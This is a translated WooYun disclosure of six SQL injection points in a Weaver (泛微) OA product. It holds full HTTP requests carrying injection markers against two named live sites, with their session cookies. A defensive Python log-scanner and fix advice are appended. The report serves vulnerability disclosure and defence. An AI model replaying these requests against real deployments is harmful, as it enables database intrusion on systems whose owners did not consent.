Vulnerability summary (followers: 24)

Defect ID: wooyun-2014-082627

Title: Generic SQL injection vulnerabilities in a 泛微 (Weaver) system, bundled (all versions)

Related vendor: cncert (National Internet Emergency Center)

Author: Coody

Submitted: 2014-11-09 14:23

Fixed: 2014-12-24 14:24

Published: 2014-12-24 14:24

Vulnerability type: SQL injection

Severity: High

Self-assessed rank: 18

Status: Handed over to a third-party partner organization (cncert National Internet Emergency Center) for handling

Source: http://www.wooyun.org; for questions or help, contact [email protected]


Vulnerability details

Disclosure status:

2014-11-09: Details sent to the vendor; awaiting the vendor's handling
2014-11-13: Vendor confirmed; details visible to the vendor only
2014-11-23: Details disclosed to core white hats and experts in the relevant field
2014-12-03: Details disclosed to regular white hats
2014-12-13: Details disclosed to intern white hats
2014-12-24: Details disclosed to the public

Brief description:

Bundled SQL injections

Detailed description:

My apologies to the sites that got caught in the crossfire~
Sites tested: http://gl.triolion.com/ && http://oaf.yitoa.com:6688/
Their version information is shown below, respectively:

(screenshot: QQ图片20141109112348.jpg)

(screenshot: QQ图片20141109112405.jpg)


Note: the first site is used as the main example; cross-checking two of the SQL injections against the second site is enough to show that they are generic, i.e. present across deployments rather than specific to one site.
SQL injection vulnerabilities (6 in total)
1# Injection point 1

GET /homepage/Homepage.jsp?hpid=4*&subCompanyId=1&isfromportal=1&isfromhp=0 HTTP/1.1
Accept: text/html, application/xhtml+xml, */*
Referer: http://gl.triolion.com/wui/main.jsp?templateId=1
Accept-Language: zh-CN
User-Agent: Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; WOW64; Trident/6.0)
Accept-Encoding: gzip, deflate
Proxy-Connection: Keep-Alive
DNT: 1
Host: gl.triolion.com
Cookie: loginfileweaver=%2Flogin%2FLogin.jsp%3Flogintype%3D1%26gopage%3D; loginidweaver=489; languageidweaver=7; JSESSIONID=abckV1LU3qY1X8kdctsMu; testBanCookie=test


(screenshot: QQ图片20141109110351.jpg)


The other site has the same issue:

GET /homepage/Homepage.jsp?hpid=21&subCompanyId=21&isfromhp=1&isfromportal=0&hastemplate= HTTP/1.1
Accept: text/html, application/xhtml+xml, */*
Referer: http://oaf.yitoa.com:6688/leftFrame.jsp
Accept-Language: zh-CN
User-Agent: Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; WOW64; Trident/6.0)
Accept-Encoding: gzip, deflate
Proxy-Connection: Keep-Alive
DNT: 1
Host: oaf.yitoa.com:6688
Cookie: loginfileweaver=/login/Login.jsp?logintype=1&gopage=; loginidweaver=1991; languageidweaver=7; iLeftMenuFrameWidth=134; testBanCookie=test; JSESSIONID=aZiM9tRkAEe4


(screenshot: QQ图片20141109111035.jpg)


2# Injection point 2

GET /page/element/7/News.jsp?ebaseid=7&eid=17*&styleid=1&hpid=4&subCompanyId=1&e71415018052369= HTTP/1.1
Host: gl.triolion.com
Proxy-Connection: keep-alive
Accept: text/html, */*
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1847.131 Safari/537.36
Referer: http://gl.triolion.com/homepage/Homepage.jsp?hpid=4&subCompanyId=1&isfromportal=1&isfromhp=0&e71415018049673=
Accept-Encoding: gzip,deflate,sdch
Accept-Language: zh-CN,zh;q=0.8,en;q=0.6,fr;q=0.4,ja;q=0.2,ko;q=0.2,ru;q=0.2,vi;q=0.2,zh-TW;q=0.2,es;q=0.2,th;q=0.2
Cookie: testBanCookie=test; JSESSIONID=abc6T3nPyo20XcS2pP1Lu; loginfileweaver=%2Flogin%2FLogin.jsp%3Flogintype%3D1%26gopage%3D; loginidweaver=489; languageidweaver=7


(screenshot: 注入1.jpg)


The other site has the same issue:

GET //page/element/7/News.jsp?ebaseid=7&eid=184*&styleid=template&hpid=21&subCompanyId=21 HTTP/1.1
Accept: text/html, application/xhtml+xml, */*
Accept-Language: zh-CN
User-Agent: Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; WOW64; Trident/6.0)
Accept-Encoding: gzip, deflate
Host: oaf.yitoa.com:6688
DNT: 1
Proxy-Connection: Keep-Alive
Cookie: loginfileweaver=/login/Login.jsp?logintype=1&gopage=; loginidweaver=1991; languageidweaver=7; iLeftMenuFrameWidth=134; testBanCookie=test; JSESSIONID=aZiM9tRkAEe4


(screenshot: QQ图片20141109111625.jpg)


3# Injection point 3

GET /CRM/data/ViewCustomerBase.jsp?requestid=-1*&isrequest=&CustomerID=11613 HTTP/1.1
Accept: text/html, application/xhtml+xml, */*
Referer: http://gl.triolion.com/CRM/data/ViewCustomer.jsp?CustomerID=11613*
Accept-Language: zh-CN
User-Agent: Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; WOW64; Trident/6.0)
Accept-Encoding: gzip, deflate
Proxy-Connection: Keep-Alive
DNT: 1
Host: gl.triolion.com
Cookie: loginfileweaver=%2Flogin%2FLogin.jsp%3Flogintype%3D1%26gopage%3D; loginidweaver=489; languageidweaver=7; JSESSIONID=abckV1LU3qY1X8kdctsMu; testBanCookie=test


(screenshot: QQ图片20141109111845.jpg)


4# Injection point 4

POST /page/element/compatible/view.jsp?ebaseid=9&eid=23*&styleid=1&hpid=4&subCompanyId=1&e71415018052423= HTTP/1.1
Host: gl.triolion.com
Proxy-Connection: keep-alive
Content-Length: 0
Accept: */*
Origin: http://gl.triolion.com
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1847.131 Safari/537.36
Referer: http://gl.triolion.com/homepage/Homepage.jsp?hpid=4&subCompanyId=1&isfromportal=1&isfromhp=0&e71415018049673=
Accept-Encoding: gzip,deflate,sdch
Accept-Language: zh-CN,zh;q=0.8,en;q=0.6,fr;q=0.4,ja;q=0.2,ko;q=0.2,ru;q=0.2,vi;q=0.2,zh-TW;q=0.2,es;q=0.2,th;q=0.2
Cookie: testBanCookie=test; JSESSIONID=abc6T3nPyo20XcS2pP1Lu; loginfileweaver=%2Flogin%2FLogin.jsp%3Flogintype%3D1%26gopage%3D; loginidweaver=489; languageidweaver=7


(screenshot: 注入2.jpg)


5# Injection point 5

GET /page/element/Weather/View.jsp?ebaseid=weather&eid=5*&styleid=1'&hpid=4'&subCompanyId=1'&e71415018052415=' HTTP/1.1
Host: gl.triolion.com
Proxy-Connection: keep-alive
Accept: text/html, */*
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1847.131 Safari/537.36
Referer: http://gl.triolion.com/homepage/Homepage.jsp?hpid=4&subCompanyId=1&isfromportal=1&isfromhp=0&e71415018049673=
Accept-Encoding: gzip,deflate,sdch
Accept-Language: zh-CN,zh;q=0.8,en;q=0.6,fr;q=0.4,ja;q=0.2,ko;q=0.2,ru;q=0.2,vi;q=0.2,zh-TW;q=0.2,es;q=0.2,th;q=0.2
Cookie: testBanCookie=test; JSESSIONID=abc6T3nPyo20XcS2pP1Lu; loginfileweaver=%2Flogin%2FLogin.jsp%3Flogintype%3D1%26gopage%3D; loginidweaver=489; languageidweaver=7


(screenshot: 注入3.jpg)


6# Injection point 6

GET /proj/data/ViewProject.jsp?ProjID=56* HTTP/1.1
Accept: text/html, application/xhtml+xml, */*
Referer: http://gl.triolion.com/proj/search/searchtask.jsp?e71415500119375=
Accept-Language: zh-CN
User-Agent: Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; WOW64; Trident/6.0)
Accept-Encoding: gzip, deflate
Proxy-Connection: Keep-Alive
DNT: 1
Host: gl.triolion.com
Cookie: loginfileweaver=%2Flogin%2FLogin.jsp%3Flogintype%3D1%26gopage%3D; loginidweaver=489; languageidweaver=7; JSESSIONID=abckV1LU3qY1X8kdctsMu; testBanCookie=test


(screenshot: 注入4.jpg)
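A defender-side log check to accompany the six injection points above. This is an added example written for this page; it is not code from the report, from Coody, or from the 泛微 (Weaver) product. It assumes a combined-format (Apache/Nginx style) access log with origin-form request targets, and that the ID parameters the report marks (hpid, eid, requestid, CustomerID, ProjID) are integers in legitimate traffic, as they are in every request the report shows. The sample log lines are constructed; the endpoint paths mirror the report. The `*` in the report's requests is the author's marker for the injection point; the check below flags any non-integer value in those parameters, so quotes, comments and keywords are caught the same way.

```python
"""Access-log review for the endpoints listed in the report (added example,
not the report's or the vendor's code). Assumptions: combined log format,
origin-form targets, and integer-valued ID parameters in normal use."""
import re
from urllib.parse import parse_qs, urlsplit

# Endpoint -> parameters the report marks as injection points. Normal values
# are integers (or -1, as in requestid=-1), so anything else is worth a look.
WATCHED = {
    "/homepage/Homepage.jsp": ("hpid",),
    "/page/element/7/News.jsp": ("eid",),
    "/CRM/data/ViewCustomerBase.jsp": ("requestid",),
    "/CRM/data/ViewCustomer.jsp": ("CustomerID",),
    "/page/element/compatible/view.jsp": ("eid",),
    "/page/element/Weather/View.jsp": ("eid",),
    "/proj/data/ViewProject.jsp": ("ProjID",),
}

# Combined log format: client ident user [timestamp] "METHOD target PROTO" status ...
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3})'
)
INT_RE = re.compile(r"^-?\d+$")


def normalize_target(target):
    """Collapse repeated leading slashes before parsing. The report's injection
    point 2 reaches the same JSP as '//page/element/7/News.jsp'; without this,
    urlsplit would treat 'page' as a host and the endpoint lookup would miss."""
    return "/" + target.lstrip("/")


def check_target(target):
    """Return [(param, decoded_value), ...] for watched parameters whose value is
    not a plain integer. Percent-encoding is decoded first, so 4%27 is seen as 4'."""
    parts = urlsplit(normalize_target(target))
    watched = WATCHED.get(parts.path)
    if watched is None:
        return []
    params = parse_qs(parts.query, keep_blank_values=True)
    findings = []
    for name in watched:
        for value in params.get(name, []):
            if not INT_RE.match(value):
                findings.append((name, value))
    return findings


def scan_log(lines):
    """Parse access-log lines and return one alert per request with findings.
    Lines that do not match the log format are skipped, not fatal."""
    alerts = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue
        findings = check_target(m["target"])
        if findings:
            alerts.append({
                "ip": m["ip"],
                "ts": m["ts"],
                "status": int(m["status"]),
                "path": urlsplit(normalize_target(m["target"])).path,
                "findings": findings,
            })
    return alerts


# Constructed sample lines (not real traffic); only the paths mirror the report.
SAMPLE_LOG = [
    '10.0.0.7 - - [09/Nov/2014:11:03:51 +0800] "GET /homepage/Homepage.jsp?hpid=4&subCompanyId=1&isfromportal=1&isfromhp=0 HTTP/1.1" 200 5123 "-" "Mozilla/5.0"',
    '10.0.0.7 - - [09/Nov/2014:11:03:55 +0800] "GET /homepage/Homepage.jsp?hpid=4%27&subCompanyId=1 HTTP/1.1" 500 412 "-" "Mozilla/5.0"',
    '10.0.0.9 - - [09/Nov/2014:11:16:25 +0800] "GET //page/element/7/News.jsp?ebaseid=7&eid=184*&styleid=template&hpid=21&subCompanyId=21 HTTP/1.1" 200 2210 "-" "Mozilla/5.0"',
    '10.0.0.7 - - [09/Nov/2014:11:18:45 +0800] "GET /CRM/data/ViewCustomerBase.jsp?requestid=-1&isrequest=&CustomerID=11613 HTTP/1.1" 200 3301 "-" "Mozilla/5.0"',
    "not an access log line",
]

if __name__ == "__main__":
    for alert in scan_log(SAMPLE_LOG):
        print(f'{alert["ts"]} {alert["ip"]} {alert["path"]} {alert["status"]} {alert["findings"]}')
```

Running the block on the constructed lines reports the two anomalous requests (the quoted hpid and the eid carrying the report's marker) and stays silent on the well-formed ones; the 500 status on the flagged Homepage.jsp line is the kind of correlation that, in real logs, separates probing that reached the database from noise. The same allowlist (integer-only for these parameters) is also the server-side validation the affected pages lack, but the durable fix is parameterized queries in the JSPs themselves.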

Proof of vulnerability:

Same as above

Fix recommendation:

Copyright notice: please credit Coody@乌云 (WooYun) when reposting


Vulnerability responses

Vendor response:

Severity: High

Vulnerability rank: 15

Confirmed: 2014-11-13 13:40

Vendor reply:

Latest status:

None yet